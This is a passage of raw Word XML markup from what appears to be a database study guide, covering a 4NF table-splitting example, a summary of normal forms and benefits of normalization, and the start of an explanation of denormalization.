          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71A4DCFE"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CBEF4FB"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24C93300"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Reading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="7F4A039E" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="502C8F99"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="588DB39A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F2FFEAD"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Cricket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5579BD42"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Here, the Hobby is independent of Course ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5E665E"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4NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (after splitting the table):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5289F25F"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Student-Course Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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4"/>
        <w:gridCol w:w="952"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="759F4A1C" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="112418A1"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Student ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30D1A478"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Course ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="648B0E16" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AEB0F0D"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26AD61BB"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="742413B9" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45A842F3"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="631D3FC3"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="03C7792F" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27159206"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="018FC6BA"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01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1680A89D"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Student-Hobby Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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4"/>
        <w:gridCol w:w="804"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="22FC6D5D" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60D15845"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Student ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A3449B4"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Hobby</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="48BA65EF" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48FC3CA3"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FAF075E"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Football</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="0DAA4191" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31E551EC"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4584AB3E"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Reading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="31A0AF8D" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57A21B8F"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01082C86"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Cricket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C7B87C4" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00393B0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368DE95">
          <v:rect id="_x0000_i2978" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1463DA"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Summary of Normal Fo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5"/>
        <w:gridCol w:w="8683"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="05FA5AD7" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B4764CE"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Normal Form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CF31F09"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="18E9606B" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="707B90EA"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1NF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F7364A8"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Eliminates repeating groups, ensures atomicity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="6F9668F5" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C24A51D"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2NF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34DF24E0"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Removes partial dependencies (depends on whole key).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="324F8366" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7845790F"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3NF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C42309C"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Eliminates transitive dependencies (non-key attribute dependent on another non-key attribute).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="034F5E52" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F70B8C5"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BCNF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="126D39CE"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Ensures that every determinant is a superkey.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="51E4656A" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16E21209"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4NF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79DA971E"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Eliminates multi-valued dependencies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="421375BD" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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Benefits of Normalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F98B284"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Reduces Data Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Saves storage space by eliminating duplicate data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20057082"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Improves Data Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures consistency and accuracy of the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9FD20" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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nhances Query Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reduces unnecessary data retrieval during queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79307C8E" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00CE4B95" w:rsidRDefault="002C0B92" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Normalization improves the design of the database, reduces the chances of anomalies, and makes the database more scalable and easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B65A5B7" w14:textId="6A58877E" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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5B275A8">
          <v:rect id="_x0000_i2979" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAF9682" w14:textId="67F4FCC9" w:rsidR="00296A28" w:rsidRPr="00CE4B95" w:rsidRDefault="002C0B92">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="711" w:name="_Toc196308191"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidR="008916D9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Denormalization</w:t>
      </w:r>
      <w:r w:rsidR="00296A28" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="711"/>
    </w:p>
    <w:p w14:paraId="2C84A185" w14:textId="3DB5E937" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00BB6DFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Denormalization is the process of intentionally introducing redundancy into a database by merging tables or adding extra fields to improve read performance, often at the expense of data integrity or storage efficiency. It is the opposite of normalization, where data is stored in a highly structured and minimalistic manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773536EA" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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While normalization aims to reduce data redundancy and maintain data integrity by organizing data into multiple related tables, denormalization is used to optimize performance, particularly in scenarios where </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> need to be faster or more efficient. Denormalization might involve combining tables, adding computed fields, or including repeated data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F88B9C6" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Why Denormalization is Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4BCA0E" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Performance Improvement</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Denormalization can improve the speed of data retrieval because fewer joins are needed between tables, making the data retrieval process faster. It is particularly helpful in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read-heavy</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35934EDB" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Simplify Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Complex queries that require multiple joins across normalized tables can be simplified by denormalizing the data. This can make it easier for developers to write queries and for applications to consume the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F45043E" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Reduce Joins</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In highly normalized databases, queries often require multiple joins, which can be computationally expensive. Denormalization reduces the number of joins, improving query performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C0B2D0" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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lastRenderedPageBreak/>
        <w:t>Reduce Complexity in Data Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In some cases, denormalized data models can be simpler for certain applications, reducing the complexity of accessing and combining related data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C98ABCF" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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When to Use Denormalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5803DA4C" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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When Performance is Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In systems where </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (such as generating reports, querying frequently accessed data) are more frequent than </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>write operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like online transaction processing), denormalization can optimize performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DA74FF" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Reporting and Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In data warehousing, OLAP (Online Analytical Processing) systems, and analytics systems, denormalization is common because these systems require fast query responses and are optimized for </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read-heavy</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C716E2" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Cache Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Denormalization can be used when caching or materialized views are employed to precompute and store results to avoid recalculating values on every request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C59113" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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istributed Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
